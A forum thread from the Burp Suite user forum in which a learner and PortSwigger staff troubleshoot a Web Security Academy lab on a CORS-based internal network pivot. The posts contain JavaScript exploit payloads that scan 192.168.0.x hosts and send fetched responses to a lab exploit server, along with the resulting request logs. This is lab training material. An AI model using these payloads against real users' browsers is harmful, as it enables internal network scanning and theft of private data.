Burp Suite User Forum


CORS vulnerability with internal network pivot attack

paulorz | Last updated: Mar 18, 2024 04:55PM UTC

Hi, how is everyone doing? I am writing this post because I am not able to advance from the first step on this lab. I am using the server provided with the lab (not Collaborator, as I don't have the Professional version) and Mozilla Firefox (even though this should not matter, since the problem I am having is when delivering the exploit to the victim). I am able to acquire the target's IP address, but the problem arises somewhere around the response.text() POC or the encodeURIComponent. This is the script I am using (I also tried the solution provided on the lab but could not solve it, either). I have stripped it of the for loop since that part works correctly; the x is replacing the number obtained previously via the for loop:

<script>
fetch('http://192.168.0.x:8080')
  .then(response => response.text())
  .then(text => fetch('http://exploit-0a8e0056034383d0837c4649011c00e8.exploit-server.net/exploit?data='+encodeURIComponent(text)))
</script>

Any help or insight will be greatly appreciated :) Thanks for the labs, they are amazing resources :D

Ben, PortSwigger Agent | Last updated: Mar 19, 2024 02:16PM UTC

Hi, Just to clarify, which step of the solution are you referring to?

paulorz | Last updated: Mar 19, 2024 03:44PM UTC

This one:

Step 1
First we need to scan the local network for the endpoint. Replace $collaboratorPayload with your own Collaborator payload or exploit server URL. Enter the following code into the exploit server. Click store then "Deliver exploit to victim". Inspect the log or the Collaborator interaction and look at the code parameter sent to it.

<script>
var q = [], collaboratorURL = 'http://$collaboratorPayload';
for(i=1;i<=255;i++) {
  q.push(function(url) {
    return function(wait) {
      fetchUrl(url, wait);
    }
  }('http://192.168.0.'+i+':8080'));
}
for(i=1;i<=20;i++){
  if(q.length)q.shift()(i*100);
}
function fetchUrl(url, wait) {
  var controller = new AbortController(), signal = controller.signal;
  fetch(url, {signal}).then(r => r.text().then(text => {
    location = collaboratorURL + '?ip='+url.replace(/^http:\/\//,'')+'&code='+encodeURIComponent(text)+'&'+Date.now();
  }))
  .catch(e => {
    if(q.length) {
      q.shift()(wait);
    }
  });
  setTimeout(x => {
    controller.abort();
    if(q.length) {
      q.shift()(wait);
    }
  }, wait);
}
</script>

Using the exploit server provided with the lab, and through testing the code by parts, I am able to get the IP address of the victim, but I am not able to follow through with the rest of the data that I am supposed to obtain. Through sending the code by parts, I could isolate that the problem is in the response.text() or the encodeURIComponent(text).

Ben, PortSwigger Agent | Last updated: Mar 20, 2024 02:23PM UTC

Hi, Thank you for the confirmation. We will take a look into this lab and get back to you.

Ben, PortSwigger Agent | Last updated: Mar 21, 2024 01:15PM UTC

Hi, Running through this lab there do appear to be some issues using the exploit server to try and solve it (using the collaborator server seems to work as expected). Let me discuss this with the Web Academy team and get back to you.

paulorz | Last updated: Mar 21, 2024 01:37PM UTC

Thanks for the quick reply. Hope you can find a solution without going through much trouble ^-^

Ben, PortSwigger Agent | Last updated: Mar 22, 2024 09:31AM UTC

Hi, We do think there is something slightly odd with the written solution when using the exploit server. If you try the following for the first step, does this then return the IP address that is required?

<script>
for (let i = 1; i < 256; i++) {
  fetch(`http://192.168.0.${i}:8080/`)
    .then(r => fetch(`http://<EXPLOIT-SERVER-URL>?${r.url}`))
    .catch(e => {});
}
</script>

paulorz | Last updated: Mar 22, 2024 11:52AM UTC

Yes. When only probing for the IP address, there is no problem. The problem arises when trying to do the response.text(), I believe (I have had to use the encodeURIComponent in other labs and I don't think that's being problematic).

paulorz | Last updated: Mar 22, 2024 12:13PM UTC

Adding information: I tried again with your same exact code. The results were the same as when I did it with the code I tried when trying to solve the lab. If I try to access the response with this code:

<script>
fetch(`http://192.168.0.109:8080/`)
  .then(r => fetch(`http://exploit-0a4100b70411589580ee7f6301710059.exploit-server.net?${encodeURIComponent(r)}`))
  .catch(e => {});
</script>

I get:

10.0.4.88 2024-03-22 12:06:34 +0000 "GET /exploit/ HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
10.0.4.88 2024-03-22 12:06:34 +0000 "GET /?%5Bobject%20Response%5D HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"

If I try to stringify, I get an empty {}:

<script>
fetch(`http://192.168.0.109:8080/`)
  .then(r => fetch(`http://exploit-0a4100b70411589580ee7f6301710059.exploit-server.net?${encodeURIComponent(JSON.stringify(r))}`))
  .catch(e => {});
</script>

10.0.4.88 2024-03-22 12:07:35 +0000 "GET /exploit/ HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
10.0.4.88 2024-03-22 12:07:35 +0000 "GET /?%7B%7D HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"

And if I try to toString() it, I get:

10.0.4.88 2024-03-22 12:12:47 +0000 "GET /exploit/ HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
10.0.4.88 2024-03-22 12:12:47 +0000 "GET /?%5Bobject%20Response%5D HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
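The three log results above all follow from how a Fetch API Response object serialises: the wrapper stringifies to "[object Response]", has no own enumerable properties for JSON.stringify, and keeps its body behind a one-shot stream that only r.text() reads. The following is an added illustration, not code from this thread or from PortSwigger; it uses the standard Response class (Node 18+ or a browser) on a constructed sample body and assumes nothing about the lab.

```javascript
// Added example: why `${r}` and JSON.stringify(r) give "[object Response]" / "{}"
// while r.text() gives the actual body. Runs offline with the global Fetch API
// Response class (Node 18+ or any browser). SAMPLE_BODY is a constructed value.

const SAMPLE_BODY = '<html><body>constructed sample page</body></html>';

function makeSampleResponse() {
  return new Response(SAMPLE_BODY, {
    status: 200,
    headers: { 'Content-Type': 'text/html' },
  });
}

// The three serialisations tried in the thread. Each one looks at the Response
// wrapper object; none of them touches the body stream.
function wrapperViews(r) {
  return {
    template: `${r}`,            // "[object Response]" (Symbol.toStringTag)
    viaToString: r.toString(),   // "[object Response]"
    json: JSON.stringify(r),     // "{}" (all fields are prototype getters)
    url: r.url,                  // plain string getter, which is why `${r.url}` worked
  };
}

// The body lives in a stream behind a promise: it must be awaited, and it can
// be consumed only once. A second text() call rejects with a TypeError.
async function readBody(r) {
  const text = await r.text();
  let secondRead = null;
  try {
    await r.text();
  } catch (e) {
    secondRead = e.name; // "TypeError": body already used
  }
  return { text, encoded: encodeURIComponent(text), secondRead };
}
```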

Ben, PortSwigger Agent | Last updated: Mar 25, 2024 08:03AM UTC

Hi, We actually believe there is a fair amount wrong with this lab in its current form and the plan is now to disable it until such a time as we can get it working for users that use both the Collaborator and the exploit server.

paulorz | Last updated: Mar 25, 2024 10:35AM UTC

Oh, well! Thanks for the help! If I can help you with anything just reach out to me ^-^

mhg | Last updated: Apr 01, 2024 09:01PM UTC

Use the .substring() JavaScript method --> get a part of the text with the fetch request: encodeURIComponent(r.substring(500,800)) // something like this.
